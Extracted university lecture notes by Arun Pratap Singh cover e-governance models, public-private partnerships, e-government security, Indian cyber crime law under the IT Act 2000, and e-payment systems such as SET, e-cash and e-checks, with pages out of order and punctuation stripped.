In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 9
9
Payment gateway protects credit cards details encrypting sensitive information such
as credit card numbers to ensure that information passes securely between the
customer and the merchant and also between merchant and payment processor
How It works
Payments In India
Going the e-way
e-PAYMENT SYSTEM IN INDIA
bull Ever-increasing technology changes
bull Growing Internet access and mobile subscriber base
bull Rising consumer confidence
bull Convenient deliverypayment models
bull India has been one of the fastest growing country for payment cards in the Asia-Pacific
region
bull India currently has approximately 130 million cards (both debit and credit) in circulation
PREPARED BY ARUN PRATAP SINGH 10
10
GROWTH IN e-PAYMENT SYSTEM
REGULATION-
The Reserve Bank of India (RBI) has been supportive in the development of electronic
payments
In this direction the ldquoPayments and Settlement System Actrdquo was enacted
Apart from being supporting the RBI has also initiated various programs to encourage e-
payments
CHANNELS OF PAYMENT-
Indian banks have put in place various channels of electronic payments in place to
encourage customers to adopt the electronic mode
Channels like the Internet mobile ATMs and drop boxes are some of the most
frequently used channels apart from bank branches
MARKET MAPPING-
E-payments processing market has two major players namely
Tech Process and Bill Desk which is a pure play electronic transaction processing company
The Indian Payment System Is Transforming From Paper Mode To Electronic Mode
Two main reasons for such shift are-
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
